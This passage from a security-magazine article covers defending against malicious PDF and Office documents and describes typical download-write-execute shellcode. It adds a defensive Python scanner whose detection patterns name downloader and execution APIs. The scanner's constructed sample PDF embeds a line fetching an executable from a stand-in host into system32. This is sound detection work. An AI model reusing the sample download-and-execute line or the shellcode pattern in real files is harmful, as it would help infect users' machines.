download issue 24 here - Help Net Security
Office applications (Adobe Reader, Microsoft Office, etc.) are being actively targeted by malware authors. Malicious documents "in the wild" that try to infect your machine by exploiting vulnerabilities in these applications abound. For more than a year now, PDF files targeting Adobe Reader have been particularly popular with malware authors.

I assume that you need to use vulnerable office applications on your business computers, and that applying patches to fix vulnerabilities is not always possible, or that it leaves your machines unprotected for a period of time. I also assume that switching to alternative office applications in order to change the attack surface is not an option for your business.

The techniques featured here help protect you from malware that targets the general Internet population. They are not appropriate for protecting you against targeted attacks. In a targeted attack, the malware author has information about his target that allows him to design his malware to operate within the (restricted) environment of that target. An example of malware used in a targeted attack is a malicious PDF document designed to steal confidential documents from a competitor.

I had one important criterion for selecting the techniques featured in this article: use only free software.

Least-privileged user account (LUA)

Almost all shellcode I see in malicious documents (PDF, Word, PowerPoint, ...) found "in the wild" does the following:

1. Download a trojan from the Internet using HTTP.
2. Write the downloaded executable to SYSTEM32.
3. Execute the downloaded executable.
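The three-step pattern above can be turned into a first-pass triage check for suspicious documents. The script below is an added example and is not code from the article: it inflates the FlateDecode streams of a PDF (where embedded JavaScript and shellcode usually live) and looks for strings that correspond to each step (an HTTP download, a SYSTEM32 path, an execution call). The Windows API names used as indicators (URLDownloadToFile, InternetOpenUrl, GetSystemDirectory, WinExec, CreateProcess, ShellExecute) are an assumption about how such shellcode is commonly written; the article describes only the behaviour, not the calls. The sample PDF is constructed inline and exploits nothing.

```python
"""Triage a document for the three-step pattern described above
(download over HTTP, write to SYSTEM32, execute the file).

Added example, not code from the article. The Windows API names used as
indicators are an assumption about how such shellcode is commonly written;
the article describes only the behaviour, not the calls."""
import re
import zlib

# Indicators grouped by the shellcode step they correspond to. Matching is
# case-insensitive because API names may be stored in either case.
INDICATORS = {
    "download_http": [
        rb"URLDownloadToFile[AW]?",
        rb"InternetOpenUrl[AW]?",
        rb"https?://[\w.\-/]+",
    ],
    "write_system32": [
        rb"system32\\+[\w\-]+\.exe",   # \\+ also matches JS-escaped paths
        rb"GetSystemDirectory[AW]?",
    ],
    "execute": [
        rb"WinExec",
        rb"CreateProcess[AW]?",
        rb"ShellExecute[AW]?",
    ],
}


def scan_bytes(data: bytes) -> dict:
    """Return {step: sorted matched strings} for every step with a hit."""
    hits = {}
    for step, patterns in INDICATORS.items():
        found = set()
        for pat in patterns:
            for m in re.finditer(pat, data, re.IGNORECASE):
                found.add(m.group(0).decode("latin-1"))
        if found:
            hits[step] = sorted(found)
    return hits


def extract_streams(pdf: bytes) -> list:
    """Return the body of every PDF stream, inflated when it is zlib
    (FlateDecode) data, so strings inside compressed JavaScript become
    visible. Streams that do not inflate are returned as-is. The negative
    lookbehind keeps 'endstream' from being taken as a stream start, and
    decompressobj tolerates a stray EOL byte around the stream body."""
    out = []
    for m in re.finditer(rb"(?<!end)stream\r?\n(.*?)\r?\nendstream", pdf, re.DOTALL):
        raw = m.group(1)
        try:
            inflated = zlib.decompressobj().decompress(raw)
            out.append(inflated if inflated else raw)
        except zlib.error:
            out.append(raw)
    return out


def scan_pdf(pdf: bytes) -> dict:
    """Scan the raw file plus every inflated stream and merge the hits."""
    merged = {}
    for chunk in [pdf] + extract_streams(pdf):
        for step, strings in scan_bytes(chunk).items():
            merged.setdefault(step, set()).update(strings)
    return {step: sorted(strings) for step, strings in merged.items()}


def is_downloader_pattern(hits: dict) -> bool:
    """True only when all three steps are present in the same document."""
    return {"download_http", "write_system32", "execute"} <= set(hits)


def build_sample_pdf(js: bytes) -> bytes:
    """Build a minimal PDF skeleton whose OpenAction runs a FlateDecode
    compressed JavaScript stream. Constructed for this example; it is not
    a real malicious file and exploits nothing."""
    body = zlib.compress(js)
    return b"".join([
        b"%PDF-1.4\n",
        b"1 0 obj\n<< /Type /Catalog /OpenAction 2 0 R >>\nendobj\n",
        b"2 0 obj\n<< /S /JavaScript /JS 3 0 R >>\nendobj\n",
        b"3 0 obj\n<< /Filter /FlateDecode /Length ", str(len(body)).encode(), b" >>\n",
        b"stream\n", body, b"\nendstream\nendobj\n%%EOF\n",
    ])


# Constructed sample: JavaScript carrying the three-step strings in clear.
SUSPICIOUS_JS = (b"var sc = unescape('%u9090');"
                 b"// URLDownloadToFileA(0, \"http://example.invalid/t.exe\","
                 b" \"C:\\\\WINDOWS\\\\system32\\\\svch.exe\", 0, 0); WinExec(...)")
BENIGN_JS = b"app.alert('hello');"

if __name__ == "__main__":
    for name, js in (("suspicious", SUSPICIOUS_JS), ("benign", BENIGN_JS)):
        hits = scan_pdf(build_sample_pdf(js))
        print(name, is_downloader_pattern(hits), hits)
```

A clear-string scan like this only catches the lazy cases: shellcode in real documents is usually stored as %u-escaped heap-spray strings or XOR-encoded, and the API names are resolved by hash rather than written out, so a miss here says nothing about the document being safe. It is useful as a cheap filter before a document goes to a sandbox or a manual look at its JavaScript.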
www.insecuremag.com 38